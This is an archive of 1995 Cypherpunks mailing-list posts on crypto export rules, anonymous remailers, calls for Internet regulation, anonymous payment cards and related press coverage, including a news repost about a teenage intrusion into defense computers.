From jcorgan at scruznet.com Tue Jan 3 18:48:58 1995
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Tue, 3 Jan 95 18:48:58 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID:

>No reason to risk a hassle by exporting PGP from the US on your
>laptop, it's everywhere. Just take your Secret Keyring file and
>download PGP from a foreign FTP site once you are out of the US.

Or you can do what someone mentioned to me he does when he travels abroad:

He keeps PGP and his keyrings on a floppy, but then _deletes_ PGP.EXE. Of course, being a good PC user, he _always_ carries a copy of Norton Undelete with him :)

Quite creative, IMHO, and technically legal.

==
Johnathan Corgan "Violence is the last refuge of the incompetent."
jcorgan at scruznet.com -Isaac Asimov
WWW: (for now) ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.htm

From dave at esi.COM.AU Tue Jan 3 19:02:58 1995
From: dave at esi.COM.AU (Dave Horsfall)
Date: Tue, 3 Jan 95 19:02:58 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9501031809.AA21532@elysion.iaks.ira.uka.de>
Message-ID:

On Tue, 3 Jan 1995, Hadmut Danisch wrote:

[ On smart compilers ]

> It's enough to recognize DES tables or PGP procedures.

And common benchmarks, such as Eratosthenes' Sieve...

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From unicorn at access.digex.net Tue Jan 3 19:04:02 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 3 Jan 95 19:04:02 PST
Subject: Calls for Reg.
[Cypherpunks=Quick&Smart]
In-Reply-To:
Message-ID:

On Tue, 3 Jan 1995, Nesta Stubbs wrote:

> Date: Tue, 3 Jan 1995 16:34:22 +0000
> From: Nesta Stubbs
> To: Cypherpunks
> Subject: calls for regulation
>
>
> This is pretty scary, I mean it always sat in the back of my mind
> that they would attempt to regulate the net, and to pass legislation and
> all, but now that it is rearing its head and looks like there is going
> to be a push for it, I am actually concerned, to the point of fear
> almost.

Let me blow all your horns.

Kudos to the exposure. Just goes to support my theory that cypherpunks tend to be way ahead of the rest of the world in predicting political moves.

I have little doubt this one will come to a head as well.

>
> i want to know everything http://www.mcs.com/~nesta/home.html
> i want to be everywhere Nesta's Home Page
> i want to fuck everyone in the world &
> i want to do something that matters /-/ a s t e zine
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From quester at eskimo.com Tue Jan 3 19:06:00 1995
From: quester at eskimo.com (Charles Bell)
Date: Tue, 3 Jan 95 19:06:00 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID:

I don't know about the rest of these suggestions, but I am reasonably sure that using a fake social security number is a violation of federal law -- no matter what the user's motivation may have been.

From sghahn at math1.kaist.ac.kr Tue Jan 3 19:15:44 1995
From: sghahn at math1.kaist.ac.kr (han@joe.math.uga.edu)
Date: Tue, 3 Jan 95 19:15:44 PST
Subject: 16 years old hacker arrested ?
Message-ID: <9501040310.AA04088@math1.kaist.ac.kr>

According to AFP(London), The Independent reported on January 3, 1995 that a sixteen-year-old boy was arrested for breaking into the computer network of US Defense Department.
The report also tells that the hacker posted documents about last year's nuclear crisis between North Korea and USA.

Does anyone know where I can get a copy of those documents?

From unicorn at access.digex.net Tue Jan 3 19:16:57 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 3 Jan 95 19:16:57 PST
Subject: H.R.4922
In-Reply-To: <01HLF9W9HYG2938CN8@delphi.com>
Message-ID:

On Tue, 3 Jan 1995 VAMAGUS at delphi.com wrote:

> Date: Tue, 03 Jan 1995 21:16:31 -0500 (EST)
> From: VAMAGUS at delphi.com
> To: cypherpunks at toad.com
> Subject: H.R.4922
>
> If I am digging up old info please excuse me, I haven't been able
> to read the majority of mail due to the volume of, fluff, shall
> we say.
>
> For U.S. cypherpunks this is it:
> H.R. 4922 "Interception of Digital and Other Communications"
> passed as of October. This is the first *I* heard about it.
> In short the bill requires:
> " ...telecommunications carrier shall insure that its equipment,
> facilities, or services are capable of (1) expeditiously isolating and
> enabling the government, pursuant to a court order or other
> authorization, to intercept, to the exclusion of all other communications,
> all wire and electronic communications carried by the carrier....etc.
>
> Time for me to generate more keys!

I assume you are concerned that this requires carriers to provide plaintext even if the end users are encrypting.

It really does not.

If you are simply concerned about mandated interception ability plain or cypher, it's mildly old news.

>
> More info available at:
> ftp.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill
> gopher.eff.org /1/EFF/Policy/Digital_Telephony/digtel94.bill
> http.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill
>
> ***************************Frenchie Sends*******************************
> * PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. *
> * As soon as any man says of the affairs of the state *
> * "What does it matter to me?" the state may be given up for lost. *
> * J.J.Rousseau - The Social Contract *
> * PGP info: email to mail-server at rtfm.mit.edu with first line: *
> * send pub/usenet/alt.security.pgp/* *
> *****************************J. Francois********************************
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From grendel at netaxs.com Tue Jan 3 19:25:24 1995
From: grendel at netaxs.com (Michael Handler)
Date: Tue, 3 Jan 95 19:25:24 PST
Subject: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID:

On Tue, 3 Jan 1995, Hal wrote:

> Another point re Canter and Siegel is that there is now a service
> calling itself CancelMoose which goes through Julf's anon server in
> Finland (anon.penet.fi) to cancel spams.

This is a common misconception. Cancelmoose[tm] doesn't use anon.penet.fi for cancelling spams -- she telnets directly into the NNTP server of a university in Norway. Strangely enough, this is the same university where Arnt Gulbrantsen works. Arnt, if you don't already know, is the Norwegian hacker who wrote the cancelbots that are being used against spams (Canter & Siegel's included).

Cancelmoose[tm] is reachable through anon.penet.fi for comments, and she always lists the form of the address (non-double-blinded)

> The scary thing about cancels is that some proposals have actually been
> directed at anonymous posts themselves.
> Someone anonymously posted
> what purported to be a grisly transcript of the last seconds of the
> doomed Challenger crew as they fell to the ocean. This caused a great
> hue and cry and some calls for banning anonymous posts and/or
> retroactively cancelling them. This led to some very amusing events
> which Detweiler has chronicled in his FAQ on anonymity, the net result
> of which was that the idea was discredited. But the emergence of
> CancelMoose is not an altogether positive event in my view.

Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies. He was promptly beaten down by the net. Feh.

-mbh-

ObCrypto: I've been working on a draft paper that puts forward a proposal to make Usenet articles uncancellable except by [1] the original author of the article or [2] the system admin who runs the NNTP server the article issued from. The problem with this is that it eliminates Cancelmoose[tm] and the other spam cancellers, who, IMHO, are Good Things.

--
Michael Handler
Philadelphia, PA
Civil Liberty Through Complex Mathematics s.s.y.g-l-b co-moderator
PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF
"They like to watch everything you do / Transmitters hidden in the wall"--JD

From rishab at dxm.ernet.in Tue Jan 3 19:28:47 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Tue, 3 Jan 95 19:28:47 PST
Subject: NYT article and LaMacchia case
Message-ID:

Anon wrote:
> I want to publicly thank John Young for making articles available. Most of
> those articles I would not otherwise have seen.

I second that!

> that John offered. Was there anyone in the world, well, in the cyberworld, who
> was fooled by the article on the Microsoft acquisition of the Catholic church?
> Anyone, who after reading that piece, considered anything other than the
> creativity of the author, should be committed to St. John's Home for the
> Desperately Dumb.
Notice that Microsoft was flooded with complaints only after Rush Limbaugh read it on his show...

> However, there was something in that article that was of concern. If the
> Massachusetts judge in the MIT student case actually said that he couldn't act
> because Congress had not enacted any laws, then it is for sure they will try to
> and they will try to act hurriedly. Hurried actions by congress are even worse

The Reuters report said:
 Although U.S. District Court Judge Richard Stearns was critical of LaMacchia's actions, he ruled he could not be prosecuted under a wire fraud statute because it could result in a flood of actions against home computer users copying even single software programmes for their own use.

Anonymity had nothing to do with it. It was clear cut copyright law - which wouldn't have hurt LaMacchia as he wasn't making anything out of it, so they tried to hit him with wire fraud, and the Judge found _that_ untenable.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh "In between the breaths is
rishab at dxm.ernet.in the space where we live"
rishab at arbornet.org - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA

From entropy at IntNet.net Tue Jan 3 19:30:34 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Tue, 3 Jan 95 19:30:34 PST
Subject: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID:

> Martha Siegel is just fucked up enough that she will probably push
> for legislation regulating the nets. Congress is just fucked up that
> they might pass it.

And if they do I will make it a definite point to do all I can to emigrate to the UK, the Netherlands, or somewhere else.

This country is increasingly becoming a police state, and I've got too many years of life left to just passively deal with it.

-jon
( --------[ Jonathan D.
Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Tue Jan 3 19:32:00 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Tue, 3 Jan 95 19:32:00 PST Subject: Anonymous payment scheme In-Reply-To: <9501040140.AB27685@eri.erinet.com> Message-ID: > I've heard of that, but I thought it was only a redundancy check to check > for read errors in the swiping process. That's why they use checksums - I have some information about the VISA-net authorization network (which came from Phrack) and also some about the actual encoding of the card, if anyone cares. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From jcorgan at scruznet.com Tue Jan 3 19:36:39 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Tue, 3 Jan 95 19:36:39 PST Subject: Edupage 1/3/95 Message-ID: Some selected articles from Educom that may interest you... *************************************************************************** Edupage, a summary of news items on information technology, is provided three times each week as a service by Educom -- a Washington, D.C.-based consortium of leading colleges and universities seeking to transform education through the use of information technology. *************************************************************************** CYBERPHOBICS GALORE A recent Gallup poll conducted for MCI shows almost half of the 600 white collar respondents admitting they are cyberphobic or resistant to new technology. More than a third do not use a computer at all, either at home or at work, and nearly 60% don't use voice mail. Two thirds do not use e-mail at work, and about the same number don't carry a pager. 
The most common reason cited for anti-technology attitudes was a fear of loss of privacy. Close runners up were worries over information overload and a fear of losing face-to-face contact with associates. (Miami Herald 1/2/95 p.22) MORE INTERNET FACTS Traffic on the NSFnet grew a whopping 110% in 1994, and the number of countries online increased from approximately 137 in 1993 to approximately 159 this past year. There were 1,964 phone calls to InterNIC Registration Services during November '94. For more facts, check out http://www.openmarket.com/info/internet-index/current-sources.html. (The Internet Index, Number 5) "GIVE US YOUR MONEY, BUT KEEP YOUR OPINIONS TO YOURSELF!" A survey of small business executives conducted for IBM by Roper Starch Worldwide shows 65% of the respondents saying that building the information highway is a good use of government funds, but only 3% think the government should have "a lot" of influence on how the highway operates. Forty-four percent felt the government should have no influence, and 49% said they thought it should have "some" say in how things were run. (Inc. Technology Premiere Issue p.19) THE WIRED REVOLUTION While saluting Wired magazine's worthy premise as a publication that addresses the social and cultural effects of digital technologies, the director of the 21st Century Project at the University of Texas blasts Wired for its "fevered, adolescent consumerism, its proud display of empty thoughts from a parade of smoke-shoveling celebrity pundits, its smug disengagement from the thorny problems facing postindustrial societies, and most annoyingly, its over-the-top narcissism. If this is the revolution, do we really want to be part of it?" (New Republic 1/9-16/95 p.19) ************************************************************************ EDUPAGE is what you've just finished reading. 
To subscribe to Edupage: send a message to: listproc at educom.edu and in the BODY of the message type: subscribe edupage Sidney Carlton (assuming that your name is Sidney Carlton; if it isn't, substitute your own name) ... To cancel subscription to Edupage: send a message to: listproc at educom.edu and in the BODY of the message type: unsubscribe edupage. ************************************************************************ Educom -- Transforming Education Through Information Technology ************************************************************************ Written by John Gehl & Suzanne Douglas. V: 404-371-1853. F: 404-371-8057 == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov From nesta at nesta.pr.mcs.net Tue Jan 3 20:31:47 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Tue, 3 Jan 95 20:31:47 PST Subject: EVEN MORE creis for regulation Message-ID: Yet ANOTHER call for net regulation. There are so many now I am hard pressed to keep track of them. It appears that the media may adopt "regulation of the Internet" as its next babe. Ya know how they adopted the Internet itself first, now watch as the entire mainstream media is flooded with calls for net regulation. Bigots' Growing Use Of Computer Networks Assailed The Simon Wiesenthal Center on 12-13-94 sent a letter to Prodigy protesting bigots online messages of hate. Rabbi Abraham Cooper of the center decries the growing use by hate groups. The Wiesenthal Center wants government policing of the internet. They fear one-sided exposure of youths to white supremacist messages. Civil libertarians and white supremacists say that free speech should prevail. Marc Rotenburg of the Electronic Privacy Info Center says that it's a difficult issue and that censorship and control are very inappropriate. White supremacist groups like the National Alliance and the American Renaissance can spread propaganda nationwide. 
These types of hate groups are kept out of mainstream media and are thus short of funds. Valerie Filds of West LA said she saw an anti latino diatribe on Prodigy that plugged American Renaissance of Louisville KY. She says she saw a message that seemed to be from a white supremacist group. She says she saw one referring to the "Diary of Anne Frank" as a "Jewish Hoax". The Wiesenthal center wants such messages deleted. Anti-semitic comments on Prodigy in 1991 resulted in a policy prohibiting "blatant expressions of hatred". Kevin Strom, who produces a radio show for National Alliance, said he was recently blocked from forums on Compuserve. He said that "the system operator decided we didn't deserve free speech." His article "The Wisdom of Henry Ford" about the book "The International Jew" was downloaded 120 times. Georgia Griffith of Compuserve said "we are not obliged to publish it for him." There are 5 m subscribers to commercial online services, 2 m to Prodigy, 20 m accessing the internet. Rabbi Cooper wants the FCC to place a cop on the internet. White supremacist propaganda is available on the internet. The Institute for Historical Review's article "Frequently Asked Questions about National Socialism" is available. Far-right activists say anonymity removes inhibitions too. The National Alliance uses Netcom Online Communications Services in California. Texts and promotions of its radio show are available there. National Alliance chairman William Pierce said "The major media in this country are very biased against our political point of view. They present us with ridicule or in a very distorted way. The information superhighway is much more free of censorship." From dave at esi.COM.AU Tue Jan 3 21:06:46 1995 From: dave at esi.COM.AU (Dave Horsfall) Date: Tue, 3 Jan 95 21:06:46 PST Subject: San Francisco Editorial In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Michael Handler wrote: > Dick Depew and AARM (Auto-Active Retro Moderation). 
He wanted to > cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies. > He was promptly beaten down by the net. Feh. He was also the one who presented a convincing argument that the one who posted the alleged transcript was none other than Julf himself; he (Dick) was getting responses from the perpetrator faster than the delayed-response mechanism would have allowed... -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From wcs at anchor.ho.att.com Tue Jan 3 21:26:57 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 21:26:57 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park Message-ID: <9501040525.AA10625@anchor.ho.att.com> Another book with some insight into Bletchley Park is "Cloak and Gown" (I forget the author), about the relationship between Yale academics and the OSS, the WW2 predecessor to the CIA. Among the various Yalies who went into the OSS was James Jesus Angleton, who spent a lot of time at Bletchley analyzing information that might be useful for US Army and covert OSS activities, and trying to support counterintelligence work by correlating the information from intercepts of German understanding of US and British plans with the Allied sources and users of those plans, to try to find leaks, traitors, moles, spies, and other types that counter-spook spooks worry about. Besides the Enigma interceptions themselves, the big secret the OSS and British intelligence were paranoid about protecting was that all the known German spies in Great Britain had been caught and turned for disinformation use (or killed); almost everything Germany was getting from its spies was bogus. 
Bill From pcw at access.digex.net Tue Jan 3 22:02:05 1995 From: pcw at access.digex.net (Peter Wayner) Date: Tue, 3 Jan 95 22:02:05 PST Subject: SAN FRANCISCO EDITORIAL Message-ID: <199501040602.AA11010@access2.digex.net> The scandalous Finland anonymous remailer is also used for good. The Samaritans, an organization in England devoted to helping folks who are thinking of suicide, often receives notes filtered through it. If someone sends me the right address, I'll send a letter to the Comical explaining this politely. We should stress the strength of anonymity. From tcmay at netcom.com Tue Jan 3 22:13:21 1995 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 3 Jan 95 22:13:21 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park In-Reply-To: <9501040525.AA10625@anchor.ho.att.com> Message-ID: <199501040551.VAA12193@netcom13.netcom.com> bill.stewart at pleasantonca.ncr.com +1-510-484-6204 wrote: > > Another book with some insight into Bletchley Park is > "Cloak and Gown" (I forget the author), about the relationship between > Yale academics and the OSS, the WW2 predecessor to the CIA. That's by Robin Winks. I have a copy, in hardback, that I found some years back in a used book store. Lots of good stuff about the central role Yale has played. > Among the various Yalies who went into the OSS was James Jesus Angleton, > who spent a lot of time at Bletchley analyzing information that might > be useful for US Army and covert OSS activities, and trying to support ... A friend of mine, Buddy Diamond, developer of the "NFL Challenge" PC game of some years back, worked with James J. Angleton on a kind of "CIA Challenge" training game. I met Buddy at the 1988 Crypto conference, and he was the main reason I got invited to the Hackers Conference that year (and thereafter, as is the norm). Oh, he went to Yale, and this had a lot to do with the CIA getting in touch with him. 
--Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From rmtodd at servalan.servalan.com Tue Jan 3 22:37:33 1995 From: rmtodd at servalan.servalan.com (Richard Todd) Date: Tue, 3 Jan 95 22:37:33 PST Subject: San Francisco Editorial In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com> Message-ID: In cypherpunks Hal Finney writes: >Another point re Cantor and Siegel is that there is now a service >calling itself CancelMoose which goes through Julf's anon server in >Finland (anon.penet.fi) to cancel spams. (Spams are off-topic, Um, not exactly. CancelMoose has a mailing address on the anon.penet.fi server, for the benefit of those who wish to contact him, but the cancels are injected elsewhere. I don't believe anon.penet.fi lets you send control messages (of which cancels are a subject) thru it. From wcs at anchor.ho.att.com Tue Jan 3 22:53:32 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 22:53:32 PST Subject: Anonymous payment scheme Message-ID: <9501040637.AA11348@anchor.ho.att.com> > HH> So, you may be able to have a form of anonymity from the person you ar > HH> transacting with, but I don't think you can be anonymous from the bank > HH> and from the government. And personally, I am more concerned about th > With a debit card you can't be anonymous, because your money resides in > the bank. 
With digital cash, and the ability to transfer money to > another digital cash card via phone lines, I don't see how they can > successfully trace everything. They will try, no doubt. I thought the origination of this thread was a hypothetical proposal to start a Cypherpunks Bank which would join Visa and issue debit cards; they could be started for cash, under pseudonyms, and would expire when they ran dry. So you and your 10,000 closest friends could call yourselves anything you want, and the merchant would know that Johnny Cash Foobar buys a lot of pharmaceutical manufacturing equipment, but doesn't know who he is. The bank's not paying interest, so they probably don't need SSNs until the next round of privacy-prevention laws, and they're not using them as credit-validation tools since they're only issuing debit cards to cash customers anyway. Meanwhile, it gets to hire lots of lawyers, pay Visa commissions, and collect interest on the float. And if you get tired of being Johnny Cash Foobar, or don't like having your purchases correlated, John Hancock's card can buy the motorboats and Joe Toshiba's can pay for the precision machine tools... The standard merchant contract with Visa/Mastercharge used to forbid merchants from asking for additional ID unless they suspected fraud; I think some states have made laws about this as well. Bill From wcs at anchor.ho.att.com Tue Jan 3 22:53:36 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 22:53:36 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <9501040641.AA11386@anchor.ho.att.com> James Donald writes: > On Mon, 2 Jan 1995, Carol Anne Braddock wrote: > > Right now, I don't think U.S. Customs is going to ask you if you > > have PGP in your PC if you leave the country, or return either. > > > > They should, and I'd be proud to say yes. > > Well Carol, I am sure your heart is in the right place, but I > do not agree. 
> > They should not, and I'd be deranged to say yes. Of course you'd be deranged to say yes, but just imagine what would happen if every Customs Thug were required to ask everyone carrying a PC into or out of the country if they had any software on it capable of protecting the privacy of their files or communications, and requiring major paperwork of anyone who said yes.... the law would be gone in a week. My latest beef with the customs thugs was when I last came back from Mexico, I noticed that their arm badges said something about like "U.S. Customs Service - Protectors of Independence" Arrrgh! Bill From wcs at anchor.ho.att.com Tue Jan 3 22:53:38 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 22:53:38 PST Subject: Art and Crypto - Re: I'm back. :) Message-ID: <9501040652.AA11466@anchor.ho.att.com> Lile Elam writes > I finally got back on cypherpunks. Have been incredibly busy > but wanted to keep in touch as several artist friends of mine > want to start using art as an encryption vehicle... Should be fun... It works on so many levels, as well - hiding encrypted bits in the low-order bits of pixel color values - representing data in the colored spots on a Seurat impressionist work or the lines and splotches on a Jackson Pollock imitation - wondering what the artist _really meant_ by a given figure :-) It also may be a good way to nag us into doing stealthy versions of PGP and other cryptosystem headers - steganography is less useful when the encrypted message always starts off with - ----- BEGIN PGP ENCRYPTED FILE and has the recipient's keyid readily findable as well. Bill From gnu Wed Jan 4 02:37:13 1995 From: gnu (gnu) Date: Wed, 4 Jan 95 02:37:13 PST Subject: Cloak and Gown In-Reply-To: <9501040525.AA10625@anchor.ho.att.com> Message-ID: <9501041037.AA11018@toad.com> > Another book with some insight into Bletchley Park is > "Cloak and Gown" (I forget the author), "Use the source, Luke!" 
% telnet locis.loc.gov L O C I S : LIBRARY OF CONGRESS INFORMATION SYSTEM To make a choice: type a number, then press ENTER 1 Library of Congress Catalog 4 Braille and Audio 2 Federal Legislation 5 Organizations 3 Copyright Information 6 Foreign Law ... b cloak and gown To choose from list, see examples at bottom. FILE: LOCI Terms alphabetically close to:CLOAK AND GOWN B01 Cloak & gown//(TITL=3) B02 Cloak and dagger//(TITL=3) B03 Cloak and dagger fiction//(TITL=2) B04 Cloak and Dagger in Predator and Prey//(TITL=1) B05 Cloak and gavel//(TITL=1) B06+Cloak and gown//(TITL=3) B07 Cloak for the dreamer//(TITL=1) B08 Cloak of Aesir//(TITL=1) B09 Cloak of competence//(TITL=1) B10 Cloak of consciousness//(TITL=1) B11 Cloak of darkness//(TITL=2) B12 Cloak of friendship//(TITL=1) ---EXAMPLES: s b6 (SELECTs line b6; creates a SET for each term type) f b6-b8/b10 (FINDs b6-b8 and b10; combines sets, displays result) r b6 (RETRIEVEs term on b6; searches text in some files) r subj=b6 (RETRIEVEs term type specified; e.g., SUBJ, TITL) f b1/b6 ITEMS 1-3 OF 3 SET 3: BRIEF DISPLAY FILE: LOCI (DESCENDING ORDER) 1. 88-672288: Winks, Robin W. Cloak and gown : scholars in America's secret war / London : Collins Harvill, 1987. 607 p. ; 24 cm. NOT IN LC COLLECTION 2. 88-30560: Winks, Robin W. Cloak & gown : scholars in the secret war, 1939-1961 / New York : Quill, 1988. p. cm. CIP - NOT YET IN LC 3. 87-7683: Winks, Robin W. Cloak & gown : scholars in the secret war, 1939-1961 / 1st ed. New York : Morrow, c1987. 607 p., [16] p. of plates : ill., ports. ; 25 cm. LC CALL NUMBER: JK468.I6 W48 1987 From dmandl at bear.com Wed Jan 4 06:03:44 1995 From: dmandl at bear.com (dmandl at bear.com) Date: Wed, 4 Jan 95 06:03:44 PST Subject: Press attack on anonymity. Message-ID: <9501041402.AA07682@yeti.bsnet> > From: > > Sandy Sandfort posted an editorial from the Mondays SF Chronicle. > > There is a front page story in todays San Jose Mercury News on why > anonymity is a bad thing. 
> > It's from a New York Times story by Peter H. Lewis > > The question is who launched all this stuff? Funny thing is, _I_ just wrote a long piece on anon remailers too, though it was obviously from a different perspective from Peter Lewis's (and a lot better written, natch). The local paper it was written for liked it, but thought the subject matter was "too technical" for its readership, so I'm hoping to get it published elsewhere. When I got the idea, all I could think of was why no one else had done a piece specifically on remailers. It's an important story. I guess everyone else was working on them at the same time. I hope that there are some good pro-anonymity pieces published soon to give some "balance." P.S.: Martha S. Siegel is absolutely out of her mind. If she wasn't lynched after the green card episode, this latest stunt should do it. --Dave. From nesta at nesta.pr.mcs.net Wed Jan 4 06:09:12 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Wed, 4 Jan 95 06:09:12 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Jonathan Cooper wrote: > > Martha Siegel is just fucked up enough that she will probably push > > for legislation regulating the nets. Congress is just fucked up that > > they might pass it. > > And if they do I will make it a definite point to do all I can to > emigrate to the UK, the Netherlands, or somewhere else. > > This country is increasingly becoming a police state, and I've got too > many years of life left to just passively deal with it. uhm Jon, it seems that emigrating would be passively dealing with it, kinda contradicting your statement that you're too young to just passively deal with it. 
i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From dmandl at bear.com Wed Jan 4 06:18:02 1995 From: dmandl at bear.com (dmandl at bear.com) Date: Wed, 4 Jan 95 06:18:02 PST Subject: Siegel and Lewis Message-ID: <9501041417.AA08643@yeti.bsnet> > From: > > I just got off the phone with Peter Lewis, reporter for the New > York Times. He is unaware of any grand conspiracy to regulate the Net, > but then again if there was one, I don't think they'd tell him. > > His piece that ran Saturday was badly mangled by the editorial > process, especially since it ran on page one. Those articles get to be > mangled by a whole new set of people who otherwise wouldn't get to > touch it. I think Lewis has basically good intentions, and does do his > homework before writing a story. I have a good friend who writes for the Times. Last time I spoke to him, he was frantically trying to get in touch with the Business editor because a piece he'd just written had been hacked to bits, with several inaccuracies introduced. He probably couldn't reach the guy, and I bet the mutilated version got printed (I don't know for sure, since I don't read the Times). This is standard. It's almost a rule that whenever there's a story on a subject you're familiar with there'll be major inaccuracies. So what does that say about all the others? > Yecchh. Now I know why I don't rely on daily newspapers for my news Well, that's one reason, anyway... --Dave. From db at Tadpole.COM Wed Jan 4 06:26:22 1995 From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 95 06:26:22 PST Subject: Siegel and Lewis In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com> Message-ID: <9501041424.AA25564@tadpole.tadpole.com> Why is it that so many cypherpunks like the economist? I learned recently that Eric is a big fan. So am I. 
You're certainly not the first other cypherpunk to mention this. Weird. I mean, it's not exactly a radical publication... it just gets its *&#$*#$ facts right. Probably this is it. Doug From perry at imsi.com Wed Jan 4 06:39:58 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 4 Jan 95 06:39:58 PST Subject: Siegel and Lewis In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com> Message-ID: <9501041431.AA14688@snark.imsi.com> Raph Levien says: > I just got off the phone with Peter Lewis, reporter for the New > York Times. He is unaware of any grand conspiracy to regulate the Net, > but then again if there was one, I don't think they'd tell him. I doubt that there is one. > Martha Siegel is just fucked up enough that she will probably push > for legislation regulating the nets. Congress is just fucked up that > they might pass it. Peter should take some responsibility for perpetuating Mr. Canter and Ms. Siegel. He failed, in my opinion, to properly reflect the situation in his articles about it in The Times. In particular, he did very little to convey that the two are de facto disbarred attorneys who had played the same games in "real space" that they had in Cyberspace and had been dragged through the coals by the Florida bar association for it because to almost anyone what they had been doing was a gross ethical violation. He also made it seem as though internet users were opposed to advertising, when, of course, advertising has been on the net for many many years, and newsgroups like comp.newprod exist to publish nothing but ads. He didn't properly convey that the defect in their behavior had been the jamming of other people's communications with their ads, rather than the act of advertising per se -- much like someone standing up during a town meeting on some local matter and starting to declaim loudly not on the purpose of the meeting but instead about how great their legal services were. 
Peter also did little to interview anyone with substantial standing in the internet community about what C&S were doing -- a quote or two from an old net hand like a Gene Spafford or someone of that ilk might have been valuable. As it was, he didn't produce much to counter the viewpoint that they were the victims rather than the victimizers. I think it is only because the "paper of record" published articles that made them look like their point of view had any merit at all that they managed to survive this long. As it is, the Tennessee Bar is looking in to whether they have committed any new ethical violations. I'd say, of course, that they had... Perry From tavi at info.polymtl.ca Wed Jan 4 06:41:39 1995 From: tavi at info.polymtl.ca (Octavian Ureche) Date: Wed, 4 Jan 95 06:41:39 PST Subject: 16 years old hacker arrested ? Message-ID: <199501041442.AA20561@von-neumann.info.polymtl.ca> > According to AFP(London), The Independent reported on January 3, 1995 > that a sixteen years old boy was arrested for breaking into the > computer network of US Defense Department. > > The report also tells that the hacker posted documents about last > year's nuclear crisis between North Korea and USA. > > Does anyone know where can I get a copy of that documents ? > This is a repost from another list: --------------------------------------------------------- TEEN-AGE HACKER TAPS INTO U.S. DEFENSE SECRETS From wire reports LONDON - A British teen-ager allegedly hacked into sensitive U.S. government computers and was able to monitor secret communications over the North Korean nuclear crisis last spring, the Independent newspaper reported Tuesday. The boy tapped into several defense computers for seven months in what U.S. officials conceded was one of the most serious breaches of computer security in recent years, the paper said. The 16-year-old, after reading the messages, put them on a bulletin board on the Internet, an international computer network accessible to 35 million users. 
